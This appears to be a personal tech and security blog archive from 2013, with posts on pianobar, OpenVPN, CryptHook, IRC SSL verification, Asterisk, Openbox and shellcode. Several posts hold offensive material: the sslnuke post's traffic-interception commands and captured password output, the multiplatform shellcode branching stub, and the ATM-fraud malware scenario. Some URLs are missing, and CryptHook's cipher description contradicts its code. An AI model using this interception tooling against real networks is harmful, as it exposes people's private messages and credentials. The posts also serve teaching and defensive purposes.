    password = pandora account password here
    Adding your username and password is optional, but it saves you from having to type them in every time.
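For reference, a minimal config with both of pianobar's credential keys filled in might look like this (the values are placeholders):

```
user =
password = your pandora password here
```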

    Step Six:

    Now to run the beauty that is pianobar for the first time. Just type pianobar into your terminal and hit enter.

    Optional steps:

    Now that we have pianobar functional, we can work on other things: encrypting our plaintext password, keybinding, etc.

    Password Encryption:


    If you're using a multimedia keyboard, you can add keybinds for pianobar. For my setup I have a Microsoft Wireless Comfort Keyboard 4000, and I'm running CrunchBang with Openbox. Openbox keybinds live in the rc.xml config file. We'll also need to grab the fifo script files; make sure you're in your .config/pianobar directory before you run the following command:
    $ git clone
    First we need to know exactly what the keys are called in order to map them to a command, so we'll use the xev tool. In your terminal, type xev and hit enter, then press one of the multimedia keys on your keyboard. You'll see output like this:
    KeyPress event, serial 46, synthetic NO, window 0x4e00001,
    root 0x370, subw 0x0, time 2488373614, (943,113), root:(1395,1057),
    state 0x10, keycode 164 (keysym 0x1008ff30, XF86Favorites), same_screen YES,
    XLookupString gives 0 bytes:
    XmbLookupString gives 0 bytes:
    XFilterEvent returns: False
    KeyRelease event, serial 46, synthetic NO, window 0x4e00001,
    root 0x370, subw 0x0, time 2488373806, (943,113), root:(1395,1057),
    state 0x10, keycode 164 (keysym 0x1008ff30, XF86Favorites), same_screen YES,
    XLookupString gives 0 bytes:
    XFilterEvent returns: False
    XF86Favorites is what we'll need to configure our keybind. So open up your rc.xml file, navigate to the keybind area, and add the XML portion to execute a command from the fifo script. The button I'm setting up is the "star" button on my keyboard, which I'm going to use to tell pianobar that I like the current song. In the rc.xml file I'm going to add:
    <keybind key="XF86Favorites">
        <action name="Execute">
            <command>/home/xplicit/.config/pianobar/ +</command>
        </action>
    </keybind>

    Now all we need to do is save the rc.xml file, reconfigure Openbox, and test it:
    └──╼ pianobar
    Welcome to pianobar (2012.05.06)! Press ? for a list of commands.
    (i) Control fifo at /home/username/.config/pianobar/ctl opened
    (i) Login... Ok.
    (i) Get stations... Ok.
      0) q   2Pac (Tupac) Radio
      1) q   A Day To Remember Radio
      2) q   Eazy-E Radio
      3) q   Eminem Radio
      4) q   Mac Miller Radio
      5) q   New Found Glory Radio
      6)  Q  QuickMix
      7) q   Tate Stevens Radio
      8) q   Travie McCoy Radio
    [?] Select station: q
      6)  Q  QuickMix
    [?] Select station: 6
    |>  Station QuickMix
    (i) Receiving new playlist... Ok.
    |>  The Last Thing I Do by Tate Stevens on Tate Stevens @ Tate Stevens Radio
    |>  I'd Rather Fuck You by Eazy-E on Eternal E (Explicit) @ Eazy-E Radio
    |>  Mr. Highway's Thinking About The End by A Day To Remember on Homesick @ A Day To Remember Radio
    You can see all my keybinds for pianobar here.
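Under the hood, the keybind script just writes a control character into pianobar's fifo (shown as ~/.config/pianobar/ctl in the output above). A minimal Python sketch of the same idea (the helper name is mine):

```python
import os

def pianobar_cmd(cmd, ctl=os.path.expanduser('~/.config/pianobar/ctl')):
    # Write a single control character into pianobar's control fifo;
    # '+' loves the current song, 'n' skips to the next track.
    with open(ctl, 'w') as fifo:
        fifo.write(cmd)
```

So pianobar_cmd('+') does the same thing as the keybind bound to the star button.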

    Links and Sources:

    Pianobar Project
    Bruce Connor fifo script

    Saturday, October 12, 2013

    Dynamic Subdomains with OpenVPN and PyTinyDNS


    As I covered in a previous post about PyTinyDNS, there are multiple uses for a dynamic DNS service like this. One of my side projects is running a private Virtual Private Network (VPN). Along with hosting my own TLDs, I wanted a custom solution for dynamically assigning a subdomain to each client that connects to the network. This way, if a user happens to get assigned a different IP, others on the net can still reach their services without any issues.


    PyTinyDNS uses redis to make dynamic additions of domains and subdomains possible without adding extra config files or restarting the daemon. PyTinyDNS also comes with an import script that lets you add either a text file full of domains or individual domains via command line arguments. We'll strip the functionality from the import tool and use it to assign dynamic subdomains through OpenVPN's scripting features.


    OpenVPN comes with built-in options to run custom scripts triggered by a number of events. The following are example events you can hook in order to build endless custom solutions.

    • --up (Executed after TCP/UDP socket bind and TUN/TAP open.)
    • --tls-verify (Executed when we have a still untrusted remote peer.)
    • --ipchange (Executed after connection authentication, or remote IP address change.)
    • --client-connect (Executed in --mode server mode immediately after client authentication.)
    • --route-up (Executed after connection authentication, either immediately after, or some number of seconds after as defined by the --route-delay option.)
    • --client-disconnect (Executed in --mode server mode on client instance shutdown.)
    • --down (Executed after TCP/UDP and TUN/TAP close.)
    • --learn-address (Executed in --mode server mode whenever an IPv4 address/route or MAC address is added to OpenVPN's internal routing table.)
    • --auth-user-pass-verify (Executed in --mode server mode on new client connections, when the client is still untrusted.)

    The only event we need to watch in order to add custom A records to PyTinyDNS is --client-connect. Go ahead and create a directory to store the custom script in.

    $ mkdir /etc/openvpn/scripts

    Now at the bottom of your OpenVPN server.conf, add the following lines.

    script-security 2
    client-connect '/usr/bin/python /etc/openvpn/scripts/'

    The Script

    The following is a quick Python script used to add the correct subdomain based on the user's common name used in the client's certificate.

    import redis
    import os

    def insert_record(domain, ip, redis_server):
        try:
            r_server = redis.Redis(redis_server)
            r_server.hset('', domain, ip)
        except:
            pass

    def main():
        redis_server = 'localhost'
        try:
            insert_record(os.environ['common_name'] + "", os.environ['ifconfig_pool_remote_ip'], redis_server)
        except:
            pass
        return 0

    if __name__ == '__main__':
        main()

    The reason for the pass statements is that the script must exit with status 0 or OpenVPN will deny the client entry. If records are not being added, check that the redis server is running and that it is in fact listening on localhost.

    Now you need to restart OpenVPN in order for the changes to server.conf to go into effect.

    $ sudo service openvpn restart


    Using the default configs with PyTinyDNS, domains that don't resolve locally are forwarded to the system's default DNS server. To avoid leaking local common names, you could implement a method to not forward requests for a particular domain name, or disable forwarding entirely by setting the PyTinyDNS option "Resolve_Nonmatch" to no.

    Thursday, October 10, 2013

    Debunking the False Security of Cardless ATMs

    According to CNN, financial services provider FIS is launching a new way for customers to access cash without an ATM card or debit card. The technology has been piloted by three banks in recent months using a mobile application called "Cardless Cash Access", and is slated for widespread implementation by mid-2014. They claim it is safer than using an ATM card. First, let's review the process described there to withdraw from an ATM without the use of a card:

    1. Log into an application on your mobile device that interacts with your bank
    2. Place an order for your cash
    3. Upon arrival to the ATM, use the application to scan a code on the ATM to prove you are physically there
    4. The ATM sees that you are there and relinquishes the requested cash

    This methodology was reviewed by Mary Monahan of Javelin Strategies & Research, and she labeled it as more secure than traditional ATM cards for the following reasons:

    • Because there is no card, there can be no “card skimming”
    • In the event your phone is stolen, the application still needs additional log-in information and PIN information

    A card skimmer is a small hardware device that can be inserted into an ATM to record the information on an ATM card when it is inserted into the machine. Her full analysis of FIS' program, "Cardless Cash Access", is behind a pay gate; I wasn't about to actually pay money for something that should be completely free information. Besides, she's wrong.

    Construction of an ATM "card skimmer" is difficult, and placing one is risky for any potential attacker. Retrieving one can be even riskier. I'd argue that this technology is even less safe than online banking. Online banking can be unsafe because malware can record information on a victim's computer, giving criminals access to bank accounts; however, the criminals in question have to jump through many hoops to actually turn this online access into cash they can use. Usually they lose some of the money in the process, and there's a trail leading back to them. To avoid this, they use scams to trick yet more victims into withdrawing and depositing the cash for them, usually with something like Western Union, so that transactions can't be "charged back" or otherwise traced back to the criminal.

    With the advent of mobile malware, I've uncovered a hypothetical way that criminals could cause much more severe damage. Similar to computers, mobile phones can be vulnerable to keylogging attacks. A keylogger is a piece of software that allows an attacker to record the buttons pressed on a keyboard, or in this case, the software keyboard on a smart phone. Smart phone keyloggers already exist, and are nothing new. Also similar to computers, proxy software can be installed on a mobile phone. Proxy software is software that allows a user to use a computer or mobile device to make it look like they are coming from the device the proxy is on, as opposed to their real location.

    So what relevance does this have to "Cardless Cash Access"? It's simple, really. An attacker could create a piece of malware that infects a person's smart phone with both a proxy and a keylogger. From there, he could record the information entered into the application. After that, it would be trivial to install the application on his own mobile device, log in, request cash, and scan the ATM code. Suppose for a moment that this didn't work, for whatever reason (like the application being locked on a per-user basis to a particular phone). At that point, the attacker could use the proxy in the malware to impersonate the victim's phone and upload the scanned key to the application from the victim's phone, resulting in the ATM dispensing the cash anyway. Not only does this make it easier for cybercriminals to gather the required data without physical intervention, it also makes it easier for a criminal to turn his access directly into cash without running a scam or jumping through the various hoops a skimmer requires. There is also much less risk involved. To hide his or her identity and "cash out", the criminal need only bring a can of black spray paint for the ATM camera.

    I talked with a mobile malware analyst, Matt McDevitt, to get an idea of how easy it would be for a malware author to write such a virus, and to determine the likelihood of such an attack. He responded saying that it would be incredibly easy for a malware author to write and deliver such a virus, and that the likelihood of such a virus being written is extreme. He further went on to say, "another [malicious] provider could come out with a trojanized version of this application". What he means here is that someone could unpack the "Cardless Cash Access" application, backdoor it, and then pack it back up for shipping to unsuspecting users. There is also the risk of a supply chain attack, which is by far more sophisticated, but not impossible. Supply chain attacks are used by some of the world's brightest computer criminals. If the master copy of "Cardless Cash Access" to be distributed to all of the end users were to be compromised, the entire financial grid could become at risk.

    I was able to come up with several ideas for making this model more secure; however, they all involve more "big brother"-type measures. For example, a thumbprint scanner at the ATM could work just as well, and using cellular GPRS data to confirm that the user is physically in the same cellular grid as the ATM would be a good start. However, many privacy advocates (including myself) prefer disabling GPRS and dislike giving their thumbprint to machines.

    Moving on, there is another feasibility problem with the "Cardless Cash Access" program. Sometimes there are cellular connectivity problems in the areas where ATMs are located. To address this, FIS has proposed an "offline mode" that would allow usage of the application regardless of connectivity problems. This is nothing but an opening for "replay" attacks, in which an attacker records the data from an "offline mode" transaction and "replays" it into an ATM, making it dispense the cash.

    In conclusion, this cardless ATM methodology removes much of the risk of getting caught from criminals intent on stealing money. Mary Monahan is quoted as saying, "The phone is becoming a security blanket; the more you can do with it, the better." Meanwhile, attackers have been using mobile devices as a proverbial malware playground. With mobile malware on the rise, the less control a phone has over your real life, the better.

    Tuesday, September 17, 2013

    CryptHook: Secure TCP/UDP Connection Wrapper


    CryptHook is a modular implementation for securing existing applications with symmetric block cipher encryption. It works by hooking the base library calls for network communication: send/sendto and recv/recvfrom. CryptHook will work with existing applications that rely on these calls.

    Download the Code

    $ git clone
    $ wget

    Hooking the Calls

    Hooking these calls via LD_PRELOAD is relatively simple, and the same technique is often used to deploy userland rootkits such as Jynx/Jynx2. Here we're only interested in hooking the four functions previously mentioned. With these hooks in place, we can intercept any data before it is sent across the network (for encryption), and any data before it reaches the client/server application (for decryption).

    static ssize_t (*old_recv)(int sockfd, void *buf, size_t len, int flags);
    static ssize_t (*old_send)(int sockfd, void *buf, size_t len, int flags);
    static ssize_t (*old_recvfrom)(int sockfd, void *buf, size_t len, int flags, struct sockaddr *src_addr, socklen_t *addrlen);
    static ssize_t (*old_sendto)(int sockfd, void *buf, size_t len, int flags, const struct sockaddr *dest_addr, socklen_t addrlen);
    ssize_t recv(int sockfd, void *buf, size_t len, int flags) {
    ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags, struct sockaddr *src_addr, socklen_t *addrlen) { 
    ssize_t send(int sockfd, const void *buf, size_t len, int flags) {
    ssize_t sendto(int sockfd, const void *buf, size_t len, int flags, const struct sockaddr *dest_addr, socklen_t addrlen) {
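For intuition, the same interposition pattern can be sketched in Python by wrapping a socket's send/recv. A toy XOR transform stands in for real AES here; CryptHook itself does this in C by preloading replacements for the functions declared above:

```python
import socket

class CryptoSocket:
    # Wrap a socket and transform bytes on the way out and back in,
    # mirroring what the hooked send/recv do around old_send/old_recv.
    def __init__(self, sock, key):
        self._sock, self._key = sock, key

    def _xor(self, data):
        # Illustration only: never use single-byte XOR as a real cipher
        return bytes(b ^ self._key for b in data)

    def send(self, data):
        return self._sock.send(self._xor(data))   # transform, then real send

    def recv(self, n):
        return self._xor(self._sock.recv(n))      # real recv, then transform

# Loopback demonstration: the wire carries scrambled bytes, but both
# wrapped endpoints see plaintext.
a, b = socket.socketpair()
ca, cb = CryptoSocket(a, 0x42), CryptoSocket(b, 0x42)
ca.send(b'hello')
print(cb.recv(5))  # b'hello'
```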

    Encrypting / Decrypting Data *Updated*

    As part of this proof of concept, I've focused primarily on the Advanced Encryption Standard (AES). CryptHook is now set up to use only AES-256 in GCM mode, but it would be relatively simple to add other algorithms that are already part of the OpenSSL library.

    #define BLOCK_CIPHER EVP_aes_256_cbc()  // EVP_aes_256_cbc() and EVP_bf_cbc() have been tested
    #define BLOCK_SIZE 16    // Blowfish = 8 AES = 16
    #define KEY_SIZE 32     // Blowfish is variable, lets go w/ 256 bits

    The key is passed to the library via an environment variable. That plaintext passphrase is then run through PBKDF2 with multiple iterations to derive the actual key. If you're going to use this in a live environment, I highly encourage you to change the salt and the number of iterations. If no key is passed to the library, it falls back to the PASSPHRASE defined below.

    #define PASSPHRASE "Hello NSA"
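For reference, the derivation step can be sketched with Python's standard library; the salt and iteration count below are placeholders, not the values in the CryptHook source:

```python
import hashlib

SALT = b'change-this-salt'   # placeholder -- change it, as advised above
ITERATIONS = 10000           # placeholder iteration count
KEY_SIZE = 32                # 256-bit key, matching KEY_SIZE above

def derive_key(passphrase):
    # PBKDF2-HMAC-SHA256 stretches a passphrase into a fixed-size key
    return hashlib.pbkdf2_hmac('sha256', passphrase.encode(), SALT,
                               ITERATIONS, dklen=KEY_SIZE)

print(len(derive_key('Hello NSA')))  # 32
```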

    Example Usage

    As discussed earlier, this can be used with many different client/server applications. As a demonstration, let's add a layer of encryption to SSHd.

    Server side:
    $ LD_PRELOAD=./ UC_KEY=OHarroNSA sshd -p 5000
    Client Side:
    $ LD_PRELOAD=./ UC_KEY=OHarroNSA ssh localhost -p 5000

    Wireshark Capture

    As you can see, the packets show up as malformed because Wireshark doesn't know how to interpret them, and the data is clearly encrypted.

    Going Beyond

    It'd be relatively simple to add an SSL header to each packet so the traffic looks even more innocuous to anyone casually observing the transaction. SSL headers for application data are five bytes. Adding a fake SSL handshake immediately upon connection would also be a nice touch.

    [SSL Record Type][SSL Version][Data Length]
    [1 Byte]         [2 Bytes]    [2 Bytes]
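Building such a header is trivial. A Python sketch of the five-byte application-data record (0x17 is the TLS application-data type, 0x0301 the TLS 1.0 version field):

```python
import struct

def fake_ssl_record(payload):
    # [type: 1 byte][version: 2 bytes][length: 2 bytes] + payload
    header = struct.pack('!BHH', 0x17, 0x0301, len(payload))
    return header + payload

rec = fake_ssl_record(b'ciphertext goes here')
print(rec[:5].hex())  # 1703010014 -- 0x14 = 20-byte payload
print(len(rec))       # 25
```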

    Friday, September 13, 2013

    Linux Kernel Structure Definition Lookup Script


    If you've ever written anything kernel side for Linux, I'm sure you've bashed your head on the keyboard as many times as I have looking through lackluster documentation and scouring source files to find structure definitions. Here's a little script that will show you the source file and line number of the given structure definition.

    First of all, this script relies on a fantastic website that lets you easily search through the Linux source files; I simply wrote a script to parse its output and show structure definition locations. Change the URL in the script to match your current kernel version number.


    $ ./ crypto_tfm
    [-] Searching for all structure definitions of: crypto_tfm
    [+] drivers/staging/rtl8192e/rtl8192e/rtl_crypto.h, line 186
    [+] drivers/staging/rtl8192u/ieee80211/rtl_crypto.h, line 189
    [+] include/linux/crypto.h, line 413

    The Source

    # Linux Kernel Structure Search
    import sys
    from BeautifulSoup import BeautifulSoup
    import requests

    def main(argv):
        struct_search = "" + argv[0]
        in_struct = 0
        print "[-] Searching for all structure definitions of: " + argv[0]
        req = requests.get(struct_search)
        soup = BeautifulSoup(req.text)
        spanTag = soup.findAll('span')
        for tag in spanTag:
            myclass = tag['class']
            if myclass == 'identtype':
                if tag.string == "Structure":
                    in_struct = 1
                elif in_struct:
                    break  # past the Structure results, stop scanning
            if myclass == "resultline" and in_struct:
                aTag = tag.find('a')
                print "[+] " + aTag.text
        if not in_struct:
            print "[-] No Structures Found"

    if __name__ == "__main__":
        main(sys.argv[1:])

    Tuesday, September 10, 2013

    sslnuke -- SSL without verification isn't secure!

    A video demonstration of the tool described in this post can be seen at

    We have all heard over and over that SSL without verification is not secure. If an SSL connection is not verified against a cached certificate, it can easily be hijacked by any attacker, so in 2013 one would think we had done away with this problem. For the web, browser vendors have pretty much solved it: browsers cache certificates and very loudly warn the user when a site offers up a self-signed certificate that should not be trusted. However, HTTPS is not the only protocol that uses SSL. Unfortunately, many clients for these other protocols do not verify by default, and even if they did, there is no guarantee of secure certificate transfer. After all, how many people are willing to pay $50 for an SSL certificate for their FTPS server?

    A common protocol that uses SSL but is rarely verified is IRC. Many IRC clients verify by default, but most users turn this off because IRC server administrators tend not to purchase legitimate SSL certificates. Some popular clients even leave SSL verification off by default (IRSSI, for example). We already know this is unwise: any attacker between a user and the IRC server can offer an invalid certificate and decrypt all of the user's traffic, including potentially sensitive messages. Most users don't even consider this when connecting to an SSL "secured" IRC server.

    sslnuke is a tool geared towards decrypting and intercepting "secured" IRC traffic. Plenty of existing tools intercept SSL traffic already, but most are geared towards HTTP. sslnuke targets IRC directly in order to demonstrate how easy it is to intercept "secured" communications. Usage is simple.


    First, add a user account for sslnuke to run as and add iptables rules to redirect traffic to it:

        # useradd -s /bin/bash -m sslnuke
        # grep sslnuke /etc/passwd
        # iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \
          --dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444

    Finally, login as sslnuke, build, and run sslnuke:

        # su -l sslnuke
        # cd sslnuke
        # make
        # ./sslnuke

    Run an IRC client and login to your favorite IRC network using SSL, IRC messages will be printed to stdout on sslnuke.

        [*] Received connection from:
        [*] Opening connection to:
        [*] Connection Using SSL!
        [*] -> AUTH ( *** Looking up your hostname...
        [*] -> AUTH ( *** Found your hostname
        [*] -> victim ( *** You are connected to with TLSv1.2-AES256-GCM-SHA384-256bits
        [*] -> nickserv ( id hello
        [*] NickServ! -> victim ( Password accepted - you are now recognized.

    sslnuke automatically detects whether a client is using SSL and handles the connection accordingly. The code could also easily be modified to capture web site passwords or FTP data: anything using SSL. To attack users on a network, sslnuke can be used in conjunction with an ARP poisoning tool, such as the one found at Blackhat Library, or it can be deployed on a gateway.


    Now on to the important part: how do we verify SSL connections? The first step is to transfer the SSL certificate over an alternative medium; the best way would be to have the administrator give you the certificate directly. If this is not possible, openssl can download the certificate from the server:

        # openssl s_client -showcerts -connect </dev/null

    Save the certificate into "~/.irssi/ssl/". It is best to run the command from a computer on a network other than your own, to prevent it from being intercepted. Next, to configure IRSSI to use the certificate, save a network:

        /network add irc
        /server add -ssl_cafile ~/.irssi/ssl/ -network irc -port 6697

    If IRSSI ever gets an invalid certificate, it will warn you and disconnect immediately. For the truly paranoid, though, a Tor hidden service or VPN should be used. To configure automatic Tor hidden service redirection on Linux, run the following commands:

        # echo "VirtualAddrNetwork" >> /etc/tor/torrc
        # echo "AutomapHostsOnResolve 1" >> /etc/tor/torrc
        # echo "TransPort 9040" >> /etc/tor/torrc
        # echo "DNSPort 5353" >> /etc/tor/torrc
        # killall -HUP tor
        # iptables -t nat -A OUTPUT -p tcp -d -j REDIRECT --to-ports 9040
        # iptables -t nat -A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports 5353
        # ncat xxxxxxxxxxxxxxx.onion 6667
        NOTICE AUTH :*** Looking up your hostname...
        NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

    Ultimately, IRC clients should use SSH-style key verification: on first connect, present the certificate fingerprint to the user, force the user to confirm it, and then cache the certificate. If it has changed the next time, do not allow the connection.
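That flow is easy to prototype. A minimal trust-on-first-use sketch in Python (the cache here is an in-memory dict; a real client would persist it to disk and prompt the user on first sight):

```python
import hashlib

def tofu_check(cache, host, der_cert):
    # Trust on first use: cache the certificate's SHA-256 fingerprint
    # the first time we see a host; refuse if it ever changes.
    fp = hashlib.sha256(der_cert).hexdigest()
    if host not in cache:
        cache[host] = fp
        return True
    return cache[host] == fp

cache = {}
print(tofu_check(cache, '', b'cert-A'))  # True: first use, cached
print(tofu_check(cache, '', b'cert-A'))  # True: unchanged
print(tofu_check(cache, '', b'cert-B'))  # False: changed, reject
```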


    The source code can be downloaded on Github.

    Saturday, September 7, 2013

    PiBowl: Raspberry Pi Secure (SIPS/SRTP) Asterisk Autoconfig Script


    This is directly related to my last post, Create your own Fishbowl: an NSA Approved Telecommunication Network. That tutorial covers setting up both OpenVPN and Asterisk to provide secure end-to-end VoIP communications. This is part of a new project to make that setup as easily deployable as possible.

    PiBowl Server

    PiBowl server is the first piece of the puzzle. It's specifically designed to be a one-stop shop for installing and configuring Asterisk on a Raspberry Pi. For this demonstration, I assume the user has a fresh installation of Raspbian on their SD card. The installation script has also been tested on Debian Wheezy and works just the same.

    Getting the Script

    PiBowl is hosted on github. You can either clone the repository, or if you don't feel like installing additional packages, access it directly using the following wget request.

    $ wget
    $ unzip

    Now that you have the script, you really only need to edit two variables defined in

    • AST_IP
    • ALLOW_CONTACT

    AST_IP is the IP address of the interface you want TLS to bind to. This prevents external users from probing or accessing Asterisk; the only traffic coming in or out should be through the VPN. ALLOW_CONTACT is the range of IPs that are able to make or receive calls. This is redundant, but it ensures we don't have any unencrypted or unwanted calls taking place.

    Running the Script

    You need to run PiBowl as sudo in order for the install to complete.

    $ sudo ./
    If you're compiling on a Raspberry Pi, go ahead and make a pot of coffee, bake a pizza, mow the lawn, take a shower, and then come back to see if it's done with the build yet. Interaction is minimal: input is required while creating the Certificate Authority password used for certificate signing, and when it comes time to build client keys. You can build as many client keys / SIP users as you want during configuration. Each user is assigned a semi-random password as well as a sequential dialing extension. Extensions can be changed by tweaking the EXTEN variable in If you need to add users later, simply refer back to the original article for how to do it manually.

    Going Beyond

    Plans are to build similar configs for a client based Raspberry Pi as well. If you'd like to help with the client side, feel free to send pull requests to the github, and I'll merge them in as appropriate. This will hopefully show people that the concept is relatively simple and easy to deploy. As this becomes more user friendly, I hope that it can be used to connect friends and families in a secure manner.

    Friday, September 6, 2013

    Creating your own key-binds in Openbox


    I love being able to control every aspect of my computer by utilizing key-binds and macros for certain tasks. This post goes over how to create key-binds in the Openbox desktop environment. As in my last post, I'll be running CrunchBang as my distribution of choice, which comes preconfigured with Openbox. And because I don't like to steer too far away from the CLI, I will be editing the configs from the terminal, per this post.

    The Configuration

    As I discussed in my last tutorial, you can locate the config file by using the find command.

    $ find ~/ -iname rc.xml
    In this case we're going to edit the rc.xml file. Before we can edit it, we need to know which keys we're going to use as shortcuts, along with the task we want that key sequence to execute. We'll use a built-in tool called 'xev' to find out what the keys are called. For the sake of this post I'm going to use Left Shift and F1 for the key-bind. So open a terminal, type xev, and press enter, then push Left Shift; you should see output like this:

    KeyPress event, serial 46, synthetic NO, window 0x4000001,
        root 0x370, subw 0x0, time 326988347, (-740,188), root:(572,1005),
        state 0x11, keycode 50 (keysym 0xffe1, Shift_L), same_screen YES,
        XLookupString gives 0 bytes:
        XFilterEvent returns: False

    Now lets push f1 and see what happens:

    KeyPress event, serial 46, synthetic NO, window 0x4000001,
        root 0x370, subw 0x0, time 327135703, (-576,193), root:(736,1010),
        state 0x10, keycode 67 (keysym 0xffbe, F1), same_screen YES,
        XLookupString gives 0 bytes:
        XmbLookupString gives 0 bytes:
        XFilterEvent returns: False

    What information does this give us? First we have the X11 key name, and we also have the keycode, which converted to hex can be used in place of the X11 key name. So, back to the rc.xml file. For simplicity we'll just use the X11 key names, Shift_L and F1 respectively. In the XML file, we need to find the area where keybinds are defined. You should see comments about keybinds, like:

    <!-- Keybindings for desktop switching -->
    Now we need to create our own. You can create your keybinds anywhere in the keybind portion of the config file. Use the following format as an example:
    <keybind key="">
         <action name="">
              <command>command goes here</command>
         </action>
    </keybind>
    Remember, in this example we're using Shift_L and F1 for the keybind. Openbox uses modifier shorthands for certain keys, such as an uppercase S for Shift, so that's what we'll insert instead of Shift_L:
    <keybind key="S-F1">
    For the action name we want it to execute a command:
    <action name="Execute">
    And for the command we'll have it open Iceweasel:
    <command>iceweasel</command>
    Our keybind altogether should look like this:
    <keybind key="S-F1">
         <action name="Execute">
              <command>iceweasel</command>
         </action>
    </keybind>

    Reload Openbox Configs

    Now that the keybinds have been changed, pressing Shift + F1 will open Iceweasel. Keybinds can be configured to do anything you want, with endless combinations of keys and actions. Once you're happy with your current configuration, we need to have Openbox reload the config files. To accomplish this, type the following into your terminal:
    $ openbox --reconfigure

    Monday, September 2, 2013

    Building a multiplatform shellcode header

    This post is a quick overview of one method for creating machine code capable of branching to any of four different platforms:

    • 32-bit Linux
    • 64-bit Linux
    • 32-bit Windows
    • 64-bit Windows

    Branching to the right platform is a multi-step process that can be broken into small pieces of code: first detect the processor architecture, then determine the operating system.

    Determining Architecture

    When I made my last post, I was reminded of an awesomely shorter technique for architecture detection that I found while googling. Because theirs is shorter (which in my opinion makes it cooler, since we aren't restricted to strictly alphanumeric code), I'll use their getCPU instead of my own for this little demonstration. Admittedly, I changed a 'jz' to a 'jnz' and re-ordered the code a little bit. Instead of bits_32 we're going to have a determine_32_os label:

      xorl %eax, %eax
      .byte 0x40, 0x90    # inc %eax; nop on 32-bit (clears ZF), a rex-prefixed nop on 64-bit (ZF stays set)
      jnz determine_32_os

    This is a 6-byte header that works on both windows and linux for determining the CPU architecture, so lets get started with determining the operating system.
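    As a quick sanity check, the assembled bytes of this header (they appear again in the disassembly later in this post) can be counted from the shell:

```shell
# 31 c0 (xor), 40 90 (inc/nop vs. rex nop), 75 08 (jnz): 6 bytes total.
printf '\x31\xc0\x40\x90\x75\x08' | wc -c
```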

    Determining operating system using segment registers


    Apparently something was seriously wrong with my testing environment. Whether it was due to virtualization or something else entirely, we suspect the trouble came from running windows 8.1 in a VM on an AMD system with the VM presenting an Intel interface. In any case, here's the workaround that doesn't rely on the parity bit: segment registers.

    Not all of the segment registers are used by every operating system's runtime environment. On windows, the %ds segment register is nearly always set, whereas on linux it is nearly always zero. To that end, we can use the following snippet of code to determine the operating system by testing for a zero value in %ds (zero means linux), but this is only valid for 64-bit. In a 32-bit world, %fs is 0 on linux while it has a value on windows:
    determine_64_os:
      mov %ds, %eax
      test %eax, %eax
      jnz win64_code
      jmp lin64_code
    determine_32_os:
      mov %fs, %eax
      test %eax, %eax
      jz lin32_code
      # falls through to win32_code

    Final code:

    The final version of this header comes out to 20 bytes and could definitely be made shorter:
      xorl %eax, %eax
      .byte 0x40, 0x90    # inc %eax; nop on 32-bit, rex nop on 64-bit
      jnz determine_32_os
    determine_64_os:
      mov %ds, %eax
      test %eax, %eax
      jnz win64_code
      jmp lin64_code
    determine_32_os:
      mov %fs, %eax
      test %eax, %eax
      jz lin32_code
      # falls through to win32_code
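    The 20-byte figure can be verified by counting the assembled opcode bytes shown in the disassembly below:

```shell
# getCPU (6) + 64-bit OS check (8) + 32-bit OS check (6) = 20 bytes.
printf '\x31\xc0\x40\x90\x75\x08\x8c\xd8\x85\xc0\x75\x0a\xeb\x07\x8c\xe0\x85\xc0\x74\x03' | wc -c
```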

    And it disassembles to:

    0000000000000001 <getcpu>:
       1: 31 c0                 xor    %eax,%eax
       3: 40 90                 rex xchg %eax,%eax
       5: 75 08                 jne    f <determine_32_os>
    0000000000000007 <determine_64_os>:
       7: 8c d8                 mov    %ds,%eax
       9: 85 c0                 test   %eax,%eax
       b: 75 0a                 jne    17 <win64_code>
       d: eb 07                 jmp    16 <lin64_code>
    000000000000000f <determine_32_os>:
       f: 8c e0                 mov    %fs,%eax
      11: 85 c0                 test   %eax,%eax
      13: 74 03                 je     18 <lin32_code>
    0000000000000015 <win32_code>:
      15: 90                    nop
    0000000000000016 <lin64_code>:
      16: 90                    nop
    0000000000000017 <win64_code>:
      17: 90                    nop
    0000000000000018 <lin32_code>:
      18: 90                    nop


    Friday, August 30, 2013

    Create Your Own Fishbowl, An NSA Approved Telecommunication Network


    With all the media attention on government spying, NSA data collection and intercepts, FISA courts, Snowden, etc., people are finally waking up and realizing that they need to take steps to actively protect themselves on the Internet. As society becomes more and more connected, the potential for data theft and abuse grows with it. Be honest though: are you really surprised?
    Now, with that out of the way, what technologies are out there that can help safeguard us from the government, crooks, and nosy neighbors? The obvious answer is encryption and layered security. How can we apply this to telecommunications in a way that works for us on the go and at home? The NSA was actually kind enough to provide the specifications needed to build our own clone of an infrastructure trusted to protect communications and material classified up to Top Secret.

    The NSA's Mobility Capability Package

    In 2012, the NSA presented their document describing the Mobility Capability Package at RSA Conference 2012. To spare you 116 pages of agency and technical speak, here are the basic components of the MCP.

    • Secure Voice Over IP (SVoIP) must have the following requirements
      • Network must be based on an IPsec VPN
      • SIP must use TLS to encrypt signaling exchange
      • SRTP will be used to encrypt voice communications
    • Secure Browsing must have the following requirements
      • Network must be based on an IPsec VPN
      • Servers will enforce TLS connections
      • The web browser on the User Equipment is configured to prohibit the storing or caching of any data in non-volatile memory.

    For the time being, we're going to disregard the requirements for web, email, etc. We're solely focused on the SVoIP and VPN setup. I know that the current requirements state the use of an IPsec VPN, but in the original requirements they planned to use an SSL-based VPN. Due to interoperability issues with proprietary SSL VPNs, the NSA elected to go with IPsec. For ease of setup and use, we're going to use OpenVPN for this article, which of course is an SSL VPN.

    Our Requirements

    • Computer hosting OpenVPN as a server
    • Computer hosting Asterisk as a server
    • Client running OpenVPN client configuration
    • Client running VoIP software capable of using TLS + SIP + SRTP
    This configuration can be used for secure end-to-end communication between PCs and cellular telephones alike (iOS and Android both have VoIP clients in their respective stores that support SRTP and SIP + TLS.)

    Setting up OpenVPN

    Whether you choose to run OpenVPN and Asterisk from your desktop, on a Raspberry Pi, in a virtual instance, on a VPS, or on a dedicated solution, go ahead and prep your environment. For consistency's sake, I'm going to show the commands for the setup on a Debian-based distro.

    Install OpenVPN

    sudo apt-get install openvpn

    Set up your own Certificate Authority (CA).

